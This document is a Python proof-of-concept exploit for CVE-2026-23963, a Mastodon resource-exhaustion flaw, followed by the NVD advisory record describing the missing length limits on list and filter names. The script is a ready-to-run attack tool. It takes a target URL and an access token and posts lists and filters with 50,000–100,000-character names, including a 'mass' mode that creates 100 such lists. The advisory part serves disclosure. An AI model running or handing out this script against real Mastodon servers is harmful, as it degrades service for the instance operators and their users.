CVE-2026-23963

# CVE-2026-23963 PoC - Mastodon Resource Exhaustion via Unlimited List/Filter Names # This PoC demonstrates creating lists with extremely long names to cause resource exhaustion import requests import json import sys class MastodonResourceExhaustion: def __init__(self, target_url, access_token): self.target_url = target_url.rstrip('/') self.access_token = access_token self.headers = { 'Authorization': f'Bearer {access_token}', 'Content-Type': 'application/json' } def create_long_list_name(self, list_name_length=100000): """ Create a list with an extremely long name to exhaust server resources """ long_name = 'A' * list_name_length endpoint = f'{self.target_url}/api/v1/lists' payload = { 'title': long_name } try: response = requests.post(endpoint, headers=self.headers, json=payload, timeout=30) if response.status_code == 200: data = response.json() print(f'[+] Successfully created list with name length: {list_name_length}') print(f'[+] List ID: {data.get("id")}') return data.get('id') else: print(f'[-] Failed to create list. Status: {response.status_code}') print(f'[-] Response: {response.text}') return None except Exception as e: print(f'[-] Error: {str(e)}') return None def create_filter_with_long_keywords(self, keyword_length=100000, keyword_count=10): """ Create filters with extremely long keywords to exhaust server resources """ endpoint = f'{self.target_url}/api/v2/filters' for i in range(keyword_count): long_keyword = 'B' * keyword_length payload = { 'phrase': long_keyword, 'context': ['home', 'notifications', 'public', 'thread'], 'irreversible': False, 'whole_word': False } try: response = requests.post(endpoint, headers=self.headers, json=payload, timeout=30) if response.status_code == 200: data = response.json() print(f'[+] Created filter {i+1}/{keyword_count} with keyword length: {keyword_length}') print(f'[+] Filter ID: {data.get("id")}') else: print(f'[-] Failed to create filter {i+1}. Status: {response.status_code}') except Exception as e: print(f'[-] Error creating filter {i+1}: {str(e)}') def mass_create_exhaustion(self, count=100, name_length=50000): """ Mass create lists with long names to maximize resource exhaustion """ print(f'[*] Starting mass resource exhaustion attack...') print(f'[*] Creating {count} lists with {name_length} char names each') created_ids = [] for i in range(count): list_id = self.create_long_list_name(name_length) if list_id: created_ids.append(list_id) if (i + 1) % 10 == 0: print(f'[*] Progress: {i+1}/{count} lists created') print(f'[+] Attack complete. Created {len(created_ids)} lists') print(f'[+] Total characters submitted: {len(created_ids) * name_length}') return created_ids if __name__ == '__main__': if len(sys.argv) < 4: print('Usage: python cve_2026_23963_poc.py <target_url> <access_token> <attack_type>') print('Example: python cve_2026_23963_poc.py https://mastodon.example.com your_token single') print('Attack types: single, filter, mass') sys.exit(1) target = sys.argv[1] token = sys.argv[2] attack_type = sys.argv[3] exploit = MastodonResourceExhaustion(target, token) if attack_type == 'single': exploit.create_long_list_name(100000) elif attack_type == 'filter': exploit.create_filter_with_long_keywords(100000, 10) elif attack_type == 'mass': exploit.mass_create_exhaustion(100, 50000) else: print('Unknown attack type') sys.exit(1)

{"cve": {"id": "CVE-2026-23963", "sourceIdentifier": "[email protected]", "published": "2026-01-22T03:15:46.550", "lastModified": "2026-02-02T20:27:15.387", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mastodon is a free, open-source social network server based on ActivityPub. Prior to versions 4.5.5, 4.4.12, and 4.3.18, the server does not enforce a maximum length for the names of lists or filters, or for filter keywords, allowing any user to set an arbitrarily long string as the name or keyword. Any local user can abuse the list or filter fields to cause disproportionate storage and computing resource usage. They can additionally cause their own web interface to be unusable, although they must intentionally do this to themselves or unknowingly approve a malicious API client. Mastodon versions v4.5.5, v4.4.12, v4.3.18 are patched."}, {"lang": "es", "value": "Mastodon es un servidor de red social gratuito, de código abierto, basado en ActivityPub. Antes de las versiones 4.5.5, 4.4.12 y 4.3.18, el servidor no aplica una longitud máxima para los nombres de listas o filtros, ni para las palabras clave de filtro, permitiendo a cualquier usuario establecer una cadena arbitrariamente larga como nombre o palabra clave. Cualquier usuario local puede abusar de los campos de lista o filtro para causar un uso desproporcionado de los recursos de almacenamiento y computación. Adicionalmente, pueden hacer que su propia interfaz web sea inutilizable, aunque deben hacerlo intencionalmente a sí mismos o aprobar sin saberlo un cliente API malicioso. Las versiones de Mastodon v4.5.5, v4.4.12, v4.3.18 están parcheadas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.3.18", "matchCriteriaId": "0ADDA491-E534-4DFB-856F-9D07F38F3A92"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4.0", "versionEndExcluding": "4.4.12", "matchCriteriaId": "9BAA2A25-EE70-4B9F-8848-2CCE9C243077"}, {"vulnerable": true, "criteria": "cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.5.0", "versionEndExcluding": "4.5.5", "matchCriteriaId": "71845808-53CF-46D1-9A12-F14F1BAED488"}]}]}], "references": [{"url": "https://github.com/mastodon/mastodon/releases/tag/v4.3.18", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mastodon/mastodon/releases/tag/v4.4.12", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mastodon/mastodon/releases/tag/v4.5.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/mastodon/mastodon/security/advisories/GHSA-6x3w-9g92-gvf3", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}